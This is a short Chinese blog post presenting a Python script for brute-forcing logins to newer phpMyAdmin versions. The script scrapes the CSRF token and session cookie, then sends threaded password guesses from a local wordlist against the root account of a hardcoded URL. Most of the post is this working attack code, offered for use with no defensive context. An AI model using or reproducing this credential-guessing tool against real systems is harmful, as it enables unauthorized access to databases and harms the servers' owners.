51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

新版 phpMyAdmin 登陆爆破 python 脚本

差不多 5.几的版本,都需要验证 cookie 和 token,之前的爆破方式都无法在爆破了

#coding=utf-8
import requests
import re
import html
import time
import sys
from concurrent.futures import ThreadPoolExecutor,as_completed
from tqdm import tqdm
url = "https://member.sss.com/phpmyadmin/index.php"
def crack_pass(passwd):
req = requests.session()
rep = req.get(url)
token = re.findall(r'token" value="(.+?)"',rep.text)[0]
token, sessions = html.unescape(token), rep.cookies['phpMyAdmin']
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
data = {
"set_session": sessions,
"pma_username":"root",
"pma_password":passwd,
"server":1,
"target":"index.php",
"token":token,
}
rep = req.post(url, data=data, timeout=60, headers=headers)
reptext = re.findall(r'<div id="pma_errors"><div class="error"><img src="themes/dot.gif" title="" alt="" class="icon ic_s_error" />(.+?)</div>',rep.text,re.S)
if "ShowDatabasesNavigationAsTree" in rep.text:
print(rep.status_code,passwd)
sys.exit()
return 0
with open(r"F:\back\pass\pass.txt","rb") as f:
pass_list = f.read()
pass_list = pass_list.split()
start_time = time.time()
with ThreadPoolExecutor(20) as pool:
to_do = []
for passwd in pass_list:
passwd = passwd.decode()
to_do.append(pool.submit(crack_pass, passwd))
`for future in tqdm(as_completed(to_do), total=len(pass_list)):
   pass
`
print('总共耗时: {} '.format(time.time()-start_time))

截图

新版 phpMyAdmin 登陆爆破 python 脚本

赞(0)
未经允许不得转载:工具盒子 » 新版 phpMyAdmin 登陆爆破 python 脚本